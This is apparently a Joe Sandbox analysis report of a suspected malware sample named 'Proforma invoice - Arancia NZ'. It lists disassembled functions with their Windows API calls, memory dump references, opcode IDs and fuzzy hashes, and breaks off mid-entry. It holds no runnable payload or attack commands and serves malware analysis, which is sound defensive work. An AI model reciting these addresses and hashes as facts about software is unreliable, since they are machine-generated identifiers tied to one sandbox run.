                                                                                                                    • Instruction Fuzzy Hash: B331C631920647DFDB75CF70DC4CBF67BACAB0A300F184565E525C21A0EB7598A9D760
                                                                                                                    Function 002A8A1F Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetWindowRect.USER32(?,?), ref: 002A8A30
                                                                                                                    • PostMessageW.USER32(?,00000201,00000001), ref: 002A8ADA
                                                                                                                    • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 002A8AE2
                                                                                                                    • PostMessageW.USER32(?,00000202,00000000), ref: 002A8AF0
                                                                                                                    • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 002A8AF8
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessagePostSleep$RectWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3382505437-0
                                                                                                                    • Opcode ID: 6f8273668e2ee784724f00081c2b08a600d05848076e40f8feea816af1ad1864
                                                                                                                    • Instruction ID: 3ede11a46112d535a920dc50aa56a59a5aa75e74462d889a6cebd190ad4b6f64
                                                                                                                    • Opcode Fuzzy Hash: 6f8273668e2ee784724f00081c2b08a600d05848076e40f8feea816af1ad1864
                                                                                                                    • Instruction Fuzzy Hash: 9931A07190021AEBDF14CFA8D94DA9E7BB5FB05315F10822AF925E61D1CBB09D24DB90
                                                                                                                    Function 002AB1EC Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • IsWindowVisible.USER32(?), ref: 002AB204
                                                                                                                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 002AB221
                                                                                                                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 002AB259
                                                                                                                    • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 002AB27F
                                                                                                                    • _wcsstr.LIBCMT ref: 002AB289
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3902887630-0
                                                                                                                    • Opcode ID: 39d26da514f1d205f22799d5e71332fb5f90e321950516148fb04d9938a94df1
                                                                                                                    • Instruction ID: 05ccec68662ff33bc85792b41529841b8f22aa332dbd8c22ef0b0936e2b06022
                                                                                                                    • Opcode Fuzzy Hash: 39d26da514f1d205f22799d5e71332fb5f90e321950516148fb04d9938a94df1
                                                                                                                    • Instruction Fuzzy Hash: 9F21B631615201BBEB169F759C49B7F7B9CDB4A750F00812AFC09DA192EF71DC60D6A0
                                                                                                                    Function 002DB14B Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00252612: GetWindowLongW.USER32(?,000000EB), ref: 00252623
                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 002DB192
                                                                                                                    • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 002DB1B7
                                                                                                                    • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 002DB1CF
                                                                                                                    • GetSystemMetrics.USER32(00000004), ref: 002DB1F8
                                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,002C0E90,00000000), ref: 002DB216
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Long$MetricsSystem
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2294984445-0
                                                                                                                    • Opcode ID: 0fcf5c3d46d9b4ff1be8659b16f700cf12a60f5f605f6205a488dde3e1d93b3f
                                                                                                                    • Instruction ID: ad69f0d54fb0bd6d763a150f67e7b0c2988ad564d722cb420efdd0fca3d5de13
                                                                                                                    • Opcode Fuzzy Hash: 0fcf5c3d46d9b4ff1be8659b16f700cf12a60f5f605f6205a488dde3e1d93b3f
                                                                                                                    • Instruction Fuzzy Hash: CE216271A20652EFCB129F38DC68A6A37A4FB05361F164726FD36D72E0D7309D209B90
                                                                                                                    Function 002A9307 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 002A9320
                                                                                                                      • Part of subcall function 00257BCC: _memmove.LIBCMT ref: 00257C06
                                                                                                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 002A9352
                                                                                                                    • __itow.LIBCMT ref: 002A936A
                                                                                                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 002A9392
                                                                                                                    • __itow.LIBCMT ref: 002A93A3
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$__itow$_memmove
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2983881199-0
                                                                                                                    • Opcode ID: b6637791ec18808fdce5aa6b05eb50085516140b952e22dfe01977799d3c5c12
                                                                                                                    • Instruction ID: 3f9733b821f29a052147bf45df0efc67ac55b75eeae26520aaef35ff9ba7ea66
                                                                                                                    • Opcode Fuzzy Hash: b6637791ec18808fdce5aa6b05eb50085516140b952e22dfe01977799d3c5c12
                                                                                                                    • Instruction Fuzzy Hash: 75210731B21209ABDF109F659C89EEE3BBCEB4A711F048065FD05D71C0DAB0CDA59B91
                                                                                                                    Function 002C5A4D Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • IsWindow.USER32(00000000), ref: 002C5A6E
                                                                                                                    • GetForegroundWindow.USER32 ref: 002C5A85
                                                                                                                    • GetDC.USER32(00000000), ref: 002C5AC1
                                                                                                                    • GetPixel.GDI32(00000000,?,00000003), ref: 002C5ACD
                                                                                                                    • ReleaseDC.USER32(00000000,00000003), ref: 002C5B08
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$ForegroundPixelRelease
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4156661090-0
                                                                                                                    • Opcode ID: 0c4faed97b7e95ef5133a19757e7aa6b474f2bd82baf0f2ab3f908b16317d34a
                                                                                                                    • Instruction ID: cf870a9ace924f9e9ce4082f79236a26ce157e3ba6bfc39fe273e7b33993fd4e
                                                                                                                    • Opcode Fuzzy Hash: 0c4faed97b7e95ef5133a19757e7aa6b474f2bd82baf0f2ab3f908b16317d34a
                                                                                                                    • Instruction Fuzzy Hash: 6621A135A11104AFD700EF65DD88A9ABBE9EF48350F14C579F81A97362CA30ED51CF94
                                                                                                                    Function 002512F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0025134D
                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 0025135C
                                                                                                                    • BeginPath.GDI32(?), ref: 00251373
                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 0025139C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ObjectSelect$BeginCreatePath
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3225163088-0
                                                                                                                    • Opcode ID: 6469fd0d8f57a3180a02e2fab9a781ec3562e8b37b69bafd58befbb837a7920b
                                                                                                                    • Instruction ID: 90fb0b73c9d381009e60f0a0e35ad435207a73ec6f47b9a9ae1b1f6f1b53fb56
                                                                                                                    • Opcode Fuzzy Hash: 6469fd0d8f57a3180a02e2fab9a781ec3562e8b37b69bafd58befbb837a7920b
                                                                                                                    • Instruction Fuzzy Hash: 4821A130922619FFDB129F29ED087A93BACFB44322F14C256F811961B0D37098B9CF94
                                                                                                                    Function 002B4A93 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 002B4ABA
                                                                                                                    • __beginthreadex.LIBCMT ref: 002B4AD8
                                                                                                                    • MessageBoxW.USER32(?,?,?,?), ref: 002B4AED
                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 002B4B03
                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 002B4B0A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3824534824-0
                                                                                                                    • Opcode ID: 7b9aed1c6cdfd826a5510a2824f338b8c29d9402c845b827362dc1d0c3d4f665
                                                                                                                    • Instruction ID: c0e6a89fc54d46e03fe7f1d6479d5c6b275fae132fdabe1e841992593731a04a
                                                                                                                    • Opcode Fuzzy Hash: 7b9aed1c6cdfd826a5510a2824f338b8c29d9402c845b827362dc1d0c3d4f665
                                                                                                                    • Instruction Fuzzy Hash: 0F112B76D15245FFC7019FA8EC48ADB7FACEB89360F148266F925D3251D671CD1087A0
                                                                                                                    Function 002A8202 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 002A821E
                                                                                                                    • GetLastError.KERNEL32(?,002A7CE2,?,?,?), ref: 002A8228
                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,002A7CE2,?,?,?), ref: 002A8237
                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,002A7CE2,?,?,?), ref: 002A823E
                                                                                                                    • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 002A8255
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 842720411-0
                                                                                                                    • Opcode ID: 7aa7ac8b66f8c3a9edb1dd99d389a5db21ade5ab5c10447ad4537d82366244f5
                                                                                                                    • Instruction ID: c269113f1b03aec0c7ac286586add24357a19ca331f35d6e3562968d7b55ce13
                                                                                                                    • Opcode Fuzzy Hash: 7aa7ac8b66f8c3a9edb1dd99d389a5db21ade5ab5c10447ad4537d82366244f5
                                                                                                                    • Instruction Fuzzy Hash: 11014B71611245EFDB604FA5ED4CD6B7BACEF8A754B50047AF80AC2220DA31CD10CA60
                                                                                                                    Function 002A710A Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,002A7044,80070057,?,?,?,002A7455), ref: 002A7127
                                                                                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,002A7044,80070057,?,?), ref: 002A7142
                                                                                                                    • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,002A7044,80070057,?,?), ref: 002A7150
                                                                                                                    • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,002A7044,80070057,?), ref: 002A7160
                                                                                                                    • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,002A7044,80070057,?,?), ref: 002A716C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3897988419-0
                                                                                                                    • Opcode ID: 4b3c95e34ace9dfb473cd90e1e5f700790385a48ac28167775bb210ab3dc1fff
                                                                                                                    • Instruction ID: ed9bafc0bf51e1f72a09033fc978cb7602f5b1dfa3dd1fcee78d7944d2784c7b
                                                                                                                    • Opcode Fuzzy Hash: 4b3c95e34ace9dfb473cd90e1e5f700790385a48ac28167775bb210ab3dc1fff
                                                                                                                    • Instruction Fuzzy Hash: F101DF72A22204BBDB104F64ED48BAABBECEF45791F144065FD49D2220DB31DD109BA4
                                                                                                                    Function 002B5244 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 002B5260
                                                                                                                    • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 002B526E
                                                                                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 002B5276
                                                                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 002B5280
                                                                                                                    • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 002B52BC
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2833360925-0
                                                                                                                    • Opcode ID: 65b984e100a4042b22a5615e6065d9444e64639e731d55c81a7ccce5f1b3e8ba
                                                                                                                    • Instruction ID: 179384e9eda0fc4f38e920e67a0e854fc12103b460b1b3388a839a85b19585d3
                                                                                                                    • Opcode Fuzzy Hash: 65b984e100a4042b22a5615e6065d9444e64639e731d55c81a7ccce5f1b3e8ba
                                                                                                                    • Instruction Fuzzy Hash: 8C011B35D12A29DBCF00EFE8ED4D6EDBB78BB09751F400156E946B6140CB70996087A5
                                                                                                                    Function 002A810A Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 002A8121
                                                                                                                    • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 002A812B
                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 002A813A
                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 002A8141
                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 002A8157
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 44706859-0
                                                                                                                    • Opcode ID: 412f584d9abc9d4c42a49cd4c71fd735b1c7ebbbfbf5406f1b15fff67f6baeb2
                                                                                                                    • Instruction ID: dc0d07206f2134d373485776fa75e33186119c440dad044a4a11d8a2bc04afb2
                                                                                                                    • Opcode Fuzzy Hash: 412f584d9abc9d4c42a49cd4c71fd735b1c7ebbbfbf5406f1b15fff67f6baeb2
                                                                                                                    • Instruction Fuzzy Hash: 95F0AF70611315AFEB510FA4EC8CE673BACFF4A755B000036F98AC2150DE60DD11DA60
                                                                                                                    Function 002AC1E3 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 002AC1F7
                                                                                                                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 002AC20E
                                                                                                                    • MessageBeep.USER32(00000000), ref: 002AC226
                                                                                                                    • KillTimer.USER32(?,0000040A), ref: 002AC242
                                                                                                                    • EndDialog.USER32(?,00000001), ref: 002AC25C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3741023627-0
                                                                                                                    • Opcode ID: 3829c62a89f2cd2a39aa5c15fa3d242cb2cbfe689000965b034e95863faa8922
                                                                                                                    • Instruction ID: 0cce374c1533335acae609213ee1a9c7c20eba3ff8b5eb25a27efd258d96c595
                                                                                                                    • Opcode Fuzzy Hash: 3829c62a89f2cd2a39aa5c15fa3d242cb2cbfe689000965b034e95863faa8922
                                                                                                                    • Instruction Fuzzy Hash: 2C01A73081430497EB206F50EE4EB96B7BCFB01706F10026AA953918E0DBF0AD548B94
                                                                                                                    Function 002513B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • EndPath.GDI32(?), ref: 002513BF
                                                                                                                    • StrokeAndFillPath.GDI32(?,?,0028B888,00000000,?), ref: 002513DB
                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 002513EE
                                                                                                                    • DeleteObject.GDI32 ref: 00251401
                                                                                                                    • StrokePath.GDI32(?), ref: 0025141C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2625713937-0
                                                                                                                    • Opcode ID: 67b50ac14b24077ebeab38c4dbcd0c305bdd5ef0467eb550050e1a7a4c0b9a19
                                                                                                                    • Instruction ID: faafa4e8806b2c5dadc63b7796bf5636da53c8dd1b35ca7d556aa25254090f94
                                                                                                                    • Opcode Fuzzy Hash: 67b50ac14b24077ebeab38c4dbcd0c305bdd5ef0467eb550050e1a7a4c0b9a19
                                                                                                                    • Instruction Fuzzy Hash: 09F03C30512B0DEBDB125F2AED4C7983FA9A744327F08C225E82A490F1C73189B9DF18
                                                                                                                    Function 002BC397 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CoInitialize.OLE32(00000000), ref: 002BC432
                                                                                                                    • CoCreateInstance.OLE32(002E2D6C,00000000,00000001,002E2BDC,?), ref: 002BC44A
                                                                                                                      • Part of subcall function 00257DE1: _memmove.LIBCMT ref: 00257E22
                                                                                                                    • CoUninitialize.OLE32 ref: 002BC6B7
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
